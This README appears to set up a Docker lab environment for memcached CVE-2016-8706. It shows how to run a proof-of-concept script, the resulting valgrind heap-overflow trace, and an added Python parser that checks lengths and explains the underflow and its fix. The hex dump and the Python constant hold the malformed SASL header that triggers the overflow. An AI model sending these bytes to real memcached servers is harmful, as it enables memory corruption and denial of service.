forked from Medicean/VulApps
## Memcached Server SASL AUTHENTICATION Remote Code Execution Vulnerability (CVE-2016-8706) Environment
### Description
Thanks to [@xing-xiao](https://github.com/xing-xiao) for providing the original environment. #6
### Vulnerability information
* [CVE-2016-8706 vulnerability details](http://www.talosintelligence.com/reports/TALOS-2016-0221/)
### Getting the environment:
1. Pull the image to your machine
```
$ docker pull medicean/vulapps:m_memcached_CVE-2016-8706
```
2. Start the environment
```
$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8706
```
> If you need a stack trace, memcached has to be started under valgrind; in that case start the environment with the following command:
```
$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh
```
### Using the Alibaba Cloud mirror (mainland China)
1. Pull the image to your machine
```
$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
```
2. Start the environment
```
$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
```
### PoC
1. Obtain the target IP address and port, e.g. 192.168.100.2 with port 11211
2. Run `docker ps` to get the container ID (e.g. the ID obtained is cfd94f8d5f93)
   Attach to the memcached process to watch the result:
```
$ docker attach cfd94f8d5f93
```
3. Run poc.py
```
$ python poc.py 192.168.100.2 11211
```
4. Check the result
```
<36 Read binary protocol data:
<36 0x80 0x21 0x00 0x20
<36 0x00 0x00 0x00 0x01
<36 0x00 0x00 0x00 0x01
<36 0x41 0x41 0x41 0x41
<36 0x41 0x41 0x41 0x41
<36 0x41 0x41 0x41 0x41
authenticated() in cmd 0x21 is true
36: going from conn_parse_cmd to conn_nread
==8== Thread 3:
==8== Invalid write of size 8
==8== at 0x413432: memcpy (string3.h:53)
==8== by 0x413432: do_item_alloc (items.c:240)
==8== by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8== by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8== by 0x4097ED: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8== Address 0x5d327e9 is 1,048,505 bytes inside a block of size 1,048,512 alloc'd
==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x40F9DF: memory_allocate (slabs.c:538)
==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233)
==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328)
==8== by 0x41007E: slabs_alloc (slabs.c:584)
==8== by 0x4131E6: do_item_alloc (items.c:180)
==8== by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8== by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8== by 0x4097ED: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8==
```
> Note:
>
> This PoC does not crash the server.
### Exp
> There is no command-execution Exp yet; if you are willing to share one, open a [Pull Request](https://github.com/Medicean/VulApps/compare) against this repository.
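The valgrind trace above shows the write landing past the end of a slab block inside `do_item_alloc`, reached from `process_bin_sasl_auth`. The root cause is visible in the 24-byte binary-protocol header the server echoed: it declares a key length of 32 but a total body length of 1, so a value length computed as body length minus key length goes negative. The following Python is an added illustration, not part of this repository and not memcached's own code: it parses the header with the field layout of the public memcached binary protocol and applies the length consistency check a SASL AUTH handler needs (key length plus extras length must fit inside the body length). The header bytes are copied from the output above; the well-formed request, the function names and the `classify` verdict strings are this example's own.

```python
from __future__ import annotations

import struct
from dataclasses import dataclass

# Constants from the public memcached binary protocol description.
MAGIC_REQUEST = 0x80
OPCODE_SASL_AUTH = 0x21
HEADER_LEN = 24
# Big-endian header layout: magic, opcode, key_len, extras_len, data_type,
# vbucket, body_len, opaque, cas.
HEADER_FMT = "!BBHBBHIIQ"


@dataclass
class BinaryHeader:
    magic: int
    opcode: int
    key_len: int
    extras_len: int
    data_type: int
    vbucket: int
    body_len: int
    opaque: int
    cas: int


def parse_header(data: bytes) -> BinaryHeader:
    """Decode the fixed 24-byte request header; raises on short input."""
    if len(data) < HEADER_LEN:
        raise ValueError(f"need {HEADER_LEN} header bytes, got {len(data)}")
    return BinaryHeader(*struct.unpack(HEADER_FMT, data[:HEADER_LEN]))


def declared_value_len(hdr: BinaryHeader) -> int:
    """Value length as a naive handler would derive it from the header.
    A negative result is the underflow that a missing bounds check lets
    through into the item allocation and copy."""
    return hdr.body_len - hdr.key_len - hdr.extras_len


def check_header(hdr: BinaryHeader) -> list[str]:
    """Return the invariant violations found in the header (empty == sane)."""
    problems: list[str] = []
    if hdr.magic != MAGIC_REQUEST:
        problems.append(f"bad request magic 0x{hdr.magic:02x}")
    if hdr.key_len + hdr.extras_len > hdr.body_len:
        problems.append(
            f"key_len {hdr.key_len} + extras_len {hdr.extras_len} "
            f"exceeds body_len {hdr.body_len}"
        )
    if hdr.opcode == OPCODE_SASL_AUTH and hdr.extras_len != 0:
        problems.append("SASL AUTH request must not carry extras")
    return problems


def classify(data: bytes) -> str:
    """Verdict for a raw request: 'ok' or 'malformed' (example's own labels)."""
    try:
        hdr = parse_header(data)
    except ValueError:
        return "malformed"
    return "malformed" if check_header(hdr) else "ok"


def build_sasl_auth(mechanism: bytes, value: bytes) -> bytes:
    """Assemble a well-formed SASL AUTH request: mechanism as key, payload as
    value, body_len covering both (constructed here for contrast)."""
    body = mechanism + value
    header = struct.pack(
        HEADER_FMT, MAGIC_REQUEST, OPCODE_SASL_AUTH, len(mechanism),
        0, 0, 0, len(body), 0, 0,
    )
    return header + body


# The 24 header bytes echoed by the server in the output above (constructed
# here from that listing).
POC_HEADER = bytes([
    0x80, 0x21, 0x00, 0x20,
    0x00, 0x00, 0x00, 0x01,
    0x00, 0x00, 0x00, 0x01,
    0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41,
])

# A consistent request for comparison: key "PLAIN" (5 bytes) plus a 10-byte
# value gives body_len 15 (credentials are placeholders).
GOOD_REQUEST = build_sasl_auth(b"PLAIN", b"\x00user\x00pass")

if __name__ == "__main__":
    for label, raw in (("poc", POC_HEADER), ("good", GOOD_REQUEST)):
        hdr = parse_header(raw)
        print(label, hdr, "value_len =", declared_value_len(hdr),
              classify(raw), check_header(hdr))
```

Run stand-alone, the echoed header decodes to opcode 0x21, key_len 32, body_len 1, and the derived value length is -31, which `check_header` reports as a length violation; the constructed PLAIN request passes with a value length of 10. The same check, placed in front of any length arithmetic on attacker-controlled header fields, is the shape of the server-side fix, and a proxy or IDS rule that flags binary-protocol requests whose key and extras lengths exceed the body length detects this class of request on the wire.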